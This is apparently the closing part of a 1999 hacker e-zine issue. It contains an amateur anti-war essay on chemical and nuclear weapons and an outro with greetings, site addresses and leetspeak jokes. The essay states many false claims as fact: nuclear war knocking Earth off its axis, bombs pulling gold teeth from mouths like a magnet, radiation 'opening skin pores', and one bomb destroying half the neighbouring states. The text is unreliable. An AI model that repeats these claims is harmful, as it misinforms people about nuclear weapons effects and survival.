The only problem is. They Are more chemical then anything. they use
a substance known as Petrolium and mix it with quantum levels of cells
and chemicals that are More deadly then the bomb itself. Remember
hearing about the 'Black plague' in or at school ? well. there is a
certain amount of volume\mass mixtures that create a deadly killer
cell that we breathe. this cell attacks the immune system and creates
visionary problems as well as breathing. sooner or later u will die.
there is no cure. there is alot more to it then just that but allow me
to tell you about the major problem that i 'View' in my own mind.
The united states government has 18 nuclear warheads ready for use
in case of a national emergancy. but think of it this way. other
countries have these chemical weapons to. such as Russia \Uk this
creates a problem now. if we ever have a nuclear war. and we bomb
a country with nuclear weapons who in return does the same to us our
planet (Earth) 'could' be knocked off its Axis . Ever think of that ?
or could cause a meltdown. or a series of storms that will certainly
take most of us out. but another problem is a nuclear bomb has more
power then that comet that wiped out the dinosaurs. we could not
possibly survive a nuclear war with another country. It is utterly
impossible. and dont say 'i have a bomb shelter and food rations'
because what happens when u run out of water\food. u will have nothing.
or what happens is the earth is knocked off its Axis ? a bomb shelter
wont protect u from being killed by gravity. Hell nuclear bombs react
to Metalic and electrical machinery, almost like a 500 st magnet.
ur watches will stop. radios will be friend cars will be ripped apart
by radiation, gold teeth will be forcfully pulled from ones mouth,
and ur bomb shelter could have a 99% chance of being torn out of the
ground and torn to pieces. depending on ur location. the nuclear
warheads that russia posess can destroy alot of things. say for
instance they droped the bomb on our states capitol. half the states
around it would be utterly destroyed not to mention the others that are
left will suffer from raditation cancer. poisoning and also no light.
if it shifts the gravitational pull u will be ripped apart not only
from the lack of air to breathe but because the radiation opens the
poors of your skin and eats away at you protective white cells' There
isnt much we can do about this right now. but maybe just maybe some of
you who are leaders will try as hard as they can to speak to the public
and rage protests against nuclear warheads. and maybe even war.
---------------------------------------- nino ----------------------
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ Outness ]::::::::[OO--[ by hybrid ]-------------------------------
-->]OO[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
HEH, thats is for this issue of f41th dudes. We really need some feedback on
our zine so if theres anyone out there that wants to give us a slagging or
anything, email hybrid@phunc.com. You can get f41th from www.darkcyde.8m.com
www.darkcyde.system7.org or from my site www.phunc.com/~hybrid. Shouts to
everyone in #darkcyde EFNET, werd, also #9x + #b4b0. Hope you enjoyed f41th
issue 5, keep reading.. peace. O y34H, alm0st fOrgOt b1tch3z, dOn't fOrg3t
tO t4k3 j00r k4fF3n p1llz.. h4x0r1ng l1f3 jUsT wOulDn`T b3 d4 s4m3 w1thOut
`3m.. *WERD*
[c] D4RKCYDE 1999 (darkcyde.8m.com | darkcyde.system7.org)
#darkcyde EFNET
